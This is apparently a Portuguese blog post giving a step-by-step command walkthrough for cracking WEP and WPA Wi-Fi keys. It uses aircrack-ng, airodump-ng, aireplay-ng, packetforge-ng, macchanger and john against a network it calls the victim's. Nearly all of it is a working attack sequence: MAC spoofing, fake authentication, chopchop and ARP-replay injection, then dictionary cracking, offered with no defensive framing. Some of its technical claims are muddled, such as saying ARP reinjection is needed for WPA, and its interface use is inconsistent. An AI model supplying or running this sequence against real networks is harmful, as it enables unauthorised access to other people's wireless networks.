Quebrando chave wep & wpa.
O Hardware utilizado foi adaptador wireless usb com chipset Realteck 8187b com driver nativo do kernel 2.6.28.7 + patch do Aircrack-ng… foi instalado o pacote iw e o john…
http://trac.aircrack-ng.org/svn/trunk/patches/
http://trac.aircrack-ng.org/svn/trunk/patches/rtl8187_hw_signal_backport_2.6.28.patch
depois do Hardware pronto… vamos colocar a mão na massa!!!
criando dispositivo mon0.. para podemos ativar o modo monitoramento da placa de rede wlan0…
#airmon-ng
vamos parar o dispositivo mon0 para mudarmos o mac dele
#airmon-ng stop wlan0
para o dispositivo…
#ifconfig mon0 down
mudar o mac…
#macchanger –mac 00:11:22:33:44:55 mon0
ativar o dispositivo mon0 para modo monitor com o novo mac…
#airmon-ng start mon0
escolher o alvo.. para copiarmos o mac..(depois de encontrado parar o programa! ctrl+4)
#airodump-ng wlan0
capturar pacotes…e o -c e o canal da vitima…(quanto mais pacotes capturados mais chance de quebrar a chave)
#airodump-ng -c 10 -w capturalogos –bssid MA:Cd:aV:IT:IM:Aa wlan0
vamos forjar uma autenticacao ao ponto de acesso…
#aireplay-ng -1 30 -e ESSIDvitima -a MA:Cd:aV:IT:IM:Aa -h 00:11:22:33:44:55 mon0
vamos atacar o AP com o chopchop attack(colocar seu mac e dispositivo real)
#aireplay-ng -4 -e ESSIDvitma -a MA:Cd:aV:IT:IM:Aa -h Ma:cP:la:ca:Re:de wlan0
reinjecao de pacotes arp… exclusivamente necessario para quebrar WPA…
#aireplay-ng -3 -b MA:Cd:aV:IT:IM:Aa -h VI:TI:MA:CO:NE:TA wlan0
vamos criar um pacote arp-request
#packetforge-ng -0 -a Ma:cP:la:ca:Re:de -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0317-133726.xor -w arp-request
vamos atacar com o pacote arp-request
#aireplay-ng -2 -r arp-request wlan0
Descobrindo a WEP ou WPA…
#aircrack-ng -x -0 -n 64 -z -f 1 -e ESSIDvitima -b Ma:cP:la:ca:Re:de capturalogos-01.cap
Se For uma Chave WPA que e mais complexa de quebrar vamos juntar o ataque a um dicionario de senhas para tornar mais eficiente…
#aircrack-ng -e SSIDvitima -w wordlist.txt capturalogos-01.cap
Pare reforcar mais ainda o ataque podemos usar o Jonh com uma boa word list…
#john –wordlist=dict.txt –rules –stdout | aircrack-ng -e ESSIDvitima capturalogos-01.cap
boa sorte!!
Bibliografia..
Nenhum comentário:
Postar um comentário